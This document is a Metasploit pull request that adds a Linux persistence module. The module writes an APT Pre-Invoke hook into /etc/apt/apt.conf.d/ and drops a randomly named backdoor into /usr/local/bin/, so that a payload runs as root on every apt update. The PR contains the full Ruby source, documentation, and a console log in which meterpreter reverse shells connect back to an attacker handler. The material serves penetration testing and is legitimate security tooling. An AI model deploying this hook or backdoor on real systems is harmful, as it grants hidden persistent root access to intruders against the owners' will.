### PR TITLE
Add Apt package manager persistence module

### DIFF
--- a/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
+++ b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
@@ -1,0 +1,36 @@
+## Apt package manager persistence
+
+This module will run a payload when the package manager is used. No
+handler is ran automatically so you must configure an appropriate
+exploit/multi/handler to connect. Module creates a pre-invoke hook
+for APT in apt.conf.d. The Hook name syntax is numeric followed by text.  
+
+### Testing
+
+1. Exploit a box that uses APT 
+2. `use linux/local/apt_package_manager_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+5. `exploit`
+
+When the system runs apt-get update the payload will launch.  You must set handler accordingly.
+
+### Options
+
+**BACKDOOR_NAME**
+Name of backdoor executable
+ 
+**HOOKNAME**
+Name of pre-invoke hook to be installed in /etc/apt/apt.conf.d/ default is (05new-hook).
+Pre-invoke hooks name syntax is numeric followed by text. 
+  
+**SESSION**
+The session to run this module on.
+ 
+### Advanced Options
+
+**WritableDir**
+Writable directory for backdoor default is (/usr/local/bin/)       
+
+
+

--- a/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
+++ b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
@@ -1,13 +1,13 @@
-## Apt package manager persistence
+## Description
 
 This module will run a payload when the package manager is used. No
 handler is ran automatically so you must configure an appropriate
-exploit/multi/handler to connect. Module creates a pre-invoke hook
-for APT in apt.conf.d. The Hook name syntax is numeric followed by text.  
+exploit/multi/handler to connect. This module creates a pre-invoke hook
+for APT in apt.conf.d. The hook name syntax is numeric followed by text.
 
-### Testing
+## Verification Steps
 
-1. Exploit a box that uses APT 
+1. Exploit a box that uses APT
 2. `use linux/local/apt_package_manager_persistence`
 3. `set SESSION <id>`
 4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
@@ -15,22 +15,52 @@ for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
 
 When the system runs apt-get update the payload will launch.  You must set handler accordingly.
 
-### Options
+## Options
 
 **BACKDOOR_NAME**
+
 Name of backdoor executable
- 
+
 **HOOKNAME**
-Name of pre-invoke hook to be installed in /etc/apt/apt.conf.d/ default is (05new-hook).
-Pre-invoke hooks name syntax is numeric followed by text. 
-  
-**SESSION**
-The session to run this module on.
- 
-### Advanced Options
+
+Name of pre-invoke hook to be installed in /etc/apt/apt.conf.d/. Pre-invoke hook name syntax is numeric followed by text.
 
 **WritableDir**
-Writable directory for backdoor default is (/usr/local/bin/)       
 
+Writable directory for backdoor default is (/usr/local/bin/)
 
+## Scenarios
 
+### Tested on Ubuntu 18.04.2 LTS
+
+```
+msf5 > use exploit/linux/local/apt_package_manager_persistence
+msf5 exploit(linux/local/apt_package_manager_persistence) > handler -p linux/x86/meterpreter/reverse_tcp -H 172.22.222.136 -P 4444
+[*] Payload handler running as background job 0.
+msf5 exploit(linux/local/apt_package_manager_persistence) > 
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Sending stage (985320 bytes) to 172.22.222.130
+[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.130:60526) at 2019-04-26 13:04:33 -0500
+
+msf5 exploit(linux/local/apt_package_manager_persistence) > set session 1
+session => 1
+msf5 exploit(linux/local/apt_package_manager_persistence) > set payload linux/x86/meterpreter/reverse_tcp 
+payload => linux/x86/meterpreter/reverse_tcp
+msf5 exploit(linux/local/apt_package_manager_persistence) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
+msf5 exploit(linux/local/apt_package_manager_persistence) > set lport 4444
+lport => 4444
+msf5 exploit(linux/local/apt_package_manager_persistence) > exploit
+
+[*] Attempting to write hook:
+[*] Wrote /etc/apt/apt.conf.d/34bmUIzfd
+[*] Backdoor uploaded /usr/local/bin/dbmqKeh6U9
+[*] Backdoor will run on next APT update
+msf5 exploit(linux/local/apt_package_manager_persistence) > 
+[*] Sending stage (985320 bytes) to 172.22.222.130
+[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.130:60528) at 2019-04-26 13:05:17 -0500
+
+msf5 exploit(linux/local/apt_package_manager_persistence) >
+```
+
+Note: Second session comes in after running `apt update` on the remote host

--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local
         ],
       'SessionTypes'   => ['shell', 'meterpreter'],
       'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
-      'DisclosureDate' => 'Mar 9 1999', # Date Apt package manager was included in Debian
+      'DisclosureDate' => '1999-03-09', # Date Apt package manager was included in Debian
       'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
       'Targets'        => [['Automatic', {}]],
       'DefaultTarget'  => 0

--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
     backdoor_path << backdoor_name
 
     print_status("Attempting to write hook:")
-    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} &\"};"
+    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} 2>/dev/null &\"};"
     write_file(hook_path, hook_script)
 
     unless exist? hook_path

--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_options(
       [
         OptString.new('HOOKNAME', [ true, 'Name of hook file to write', '05new-hook' ]),
-        OptString.new('BACKDOOR_NAME', [ true, 'Name of binary to write', 'apthook' ])
+        OptString.new('BACKDOOR_NAME', [ false, 'Name of binary to write' ])
       ])
 
     register_advanced_options(
@@ -65,7 +65,8 @@ class MetasploitModule < Msf::Exploit::Local
     unless writable? backdoor_path
       fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
     end
-    backdoor_path << datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
+    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
+    backdoor_path << backdoor_name
 
     print_status("Attempting to write hook:")
     hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} &\"};"

--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status('Backdoor will run on next Apt update')
 
     # permissions chosen to reflect common perms in /usr/local/bin/
-    chmod(backdoor_path, 0755) 
-  
+    chmod(backdoor_path, 0755)
+
   end
 end

--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Local
       'Description'    => %q(
         This module will run a payload when the package manager is used. No
         handler is ran automatically so you must configure an appropriate
-        exploit/multi/handler to connect. Module creates a pre-invoke hook
-        for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
+        exploit/multi/handler to connect. This module creates a pre-invoke hook
+        for APT in apt.conf.d. The hook name syntax is numeric followed by text.
       ),
       'License'        => MSF_LICENSE,
       'Author'         => ['Aaron Ringo'],
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local
         ],
       'SessionTypes'   => ['shell', 'meterpreter'],
       'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
-      'DisclosureDate' => '1999-03-09', # Date Apt package manager was included in Debian
+      'DisclosureDate' => '1999-03-09', # Date APT package manager was included in Debian
       'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
       'Targets'        => [['Automatic', {}]],
       'DefaultTarget'  => 0
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options(
       [
-        OptString.new('HOOKNAME', [true, 'Name of hook file to write', '05new-hook']),
+        OptString.new('HOOKNAME', [false, 'Name of hook file to write']),
         OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
       ])
 
@@ -56,9 +56,9 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     hook_path = '/etc/apt/apt.conf.d/'
     unless writable? hook_path
-      fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system"
+      fail_with Failure::BadConfig, "#{hook_path} not writable, or APT is not on system"
     end
-    hook_path << datastore['HOOKNAME']
+    hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")
 
     backdoor_path = datastore['WritableDir']
     unless writable? backdoor_path
@@ -86,10 +86,9 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
     end
     print_status("Backdoor uploaded #{backdoor_path}")
-    print_status('Backdoor will run on next Apt update')
+    print_status('Backdoor will run on next APT update')
 
     # permissions chosen to reflect common perms in /usr/local/bin/
     chmod(backdoor_path, 0755)
-
   end
 end

--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -13,15 +13,15 @@ class MetasploitModule < Msf::Exploit::Local
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'APT Package Manager Persistence',
-      'Description'    => %q{
+      'Description'    => %q(
         This module will run a payload when the package manager is used. No
         handler is ran automatically so you must configure an appropriate
         exploit/multi/handler to connect. Module creates a pre-invoke hook
         for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
-      },
+      ),
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'Aaron Ringo' ],
-      'Platform'       => [ 'linux','unix' ],
+      'Author'         => ['Aaron Ringo'],
+      'Platform'       => ['linux', 'unix'],
       'Arch'           =>
         [
           ARCH_CMD,
@@ -33,29 +33,28 @@ class MetasploitModule < Msf::Exploit::Local
           ARCH_MIPSLE,
           ARCH_MIPSBE
         ],
-      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
       'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
       'DisclosureDate' => 'Mar 9 1999', # Date Apt package manager was included in Debian
       'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
-      'Targets'        => [ ['Automatic', {}] ],
+      'Targets'        => [['Automatic', {}]],
       'DefaultTarget'  => 0
     ))
 
     register_options(
       [
-        OptString.new('HOOKNAME', [ true, 'Name of hook file to write', '05new-hook' ]),
-        OptString.new('BACKDOOR_NAME', [ false, 'Name of binary to write' ])
+        OptString.new('HOOKNAME', [true, 'Name of hook file to write', '05new-hook']),
+        OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
       ])
 
     register_advanced_options(
       [
-        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/usr/local/bin/' ])
+        OptString.new('WritableDir', [true, 'A directory where we can write files', '/usr/local/bin/'])
       ])
-    end
+  end
 
   def exploit
-
-    hook_path = "/etc/apt/apt.conf.d/"
+    hook_path = '/etc/apt/apt.conf.d/'
     unless writable? hook_path
       fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system"
     end
@@ -68,12 +67,12 @@ class MetasploitModule < Msf::Exploit::Local
     backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
     backdoor_path << backdoor_name
 
-    print_status("Attempting to write hook:")
+    print_status('Attempting to write hook:')
     hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} 2>/dev/null &\"};"
     write_file(hook_path, hook_script)
 
     unless exist? hook_path
-      fail_with Failure::Unknown, "Failed to write Hook"
+      fail_with Failure::Unknown, 'Failed to write Hook'
     end
     print_status("Wrote #{hook_path}")
 
@@ -87,11 +86,10 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
     end
     print_status("Backdoor uploaded #{backdoor_path}")
-    print_status("Backdoor will run on next Apt update")
+    print_status('Backdoor will run on next Apt update')
 
     # permissions chosen to reflect common perms in /usr/local/bin/
-    chmod(backdoor_path, 0755)
-
+    chmod(backdoor_path, 0755) 
+  
   end
 end
-

--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -1,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'APT Package Manager Persistence',
+      'Description'    => %q{
+        This module will run a payload when the package manager is used. No
+        handler is ran automatically so you must configure an appropriate
+        exploit/multi/handler to connect. Module creates a pre-invoke hook
+        for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Aaron Ringo' ],
+      'Platform'       => [ 'linux','unix' ],
+      'Arch'           =>
+        [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+      'DisclosureDate' => 'Mar 9 1999', # Date Apt package manager was included in Debian
+      'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('HOOKNAME', [ true, 'Name of hook file to write', '05new-hook' ]),
+        OptString.new('BACKDOOR_NAME', [ true, 'Name of binary to write', 'apthook' ])
+      ])
+
+    register_advanced_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/usr/local/bin/' ])
+      ])
+    end
+
+  def exploit
+
+    hook_path = "/etc/apt/apt.conf.d/"
+    unless writable? hook_path
+      fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system"
+    end
+    hook_path << datastore['HOOKNAME']
+
+    backdoor_path = datastore['WritableDir']
+    unless writable? backdoor_path
+      fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
+    end
+    backdoor_path << datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
+
+    print_status("Attempting to write hook:")
+    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} &\"};"
+    write_file(hook_path, hook_script)
+
+    unless exist? hook_path
+      fail_with Failure::Unknown, "Failed to write Hook"
+    end
+    print_status("Wrote #{hook_path}")
+
+    if payload.arch.first == 'cmd'
+      write_file(backdoor_path, payload.encoded)
+    else
+      write_file(backdoor_path, generate_payload_exe)
+    end
+
+    unless exist? backdoor_path
+      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
+    end
+    print_status("Backdoor uploaded #{backdoor_path}")
+    print_status("Backdoor will run on next Apt update")
+
+    # permissions chosen to reflect common perms in /usr/local/bin/
+    chmod(backdoor_path, 0755)
+
+  end
+end
+


### PR DESCRIPTION
This module will run a payload when the package manager is triggered. Module installs a pre-invoke hook for APT in apt.conf.d.  

## Verification

- [x] Start `msfconsole`
- [x] Get a privileged session on a target that uses the Apt package manger 
- [x] `use exploit/linux/local/apt_package_manager_persistence`
- [x] Choose a payload and set options 
- [x] `exploit`
- [x] **Verify** Wrote hook file , wrote binary
- [x] **Verify** fail if no permissions to write hook or binary
- [x] `use exploit/multi/handler/` 
- [x] Choose a payload and set options 
- [x] `run`
- [x] On target run `sudo apt-get update`
- [x] **Verify** Caught a root session
- [x] **Documentation** Included  

![apt](https://user-images.githubusercontent.com/3400203/55281906-b7341b80-5308-11e9-9ed7-f2f9851d3e1e.png)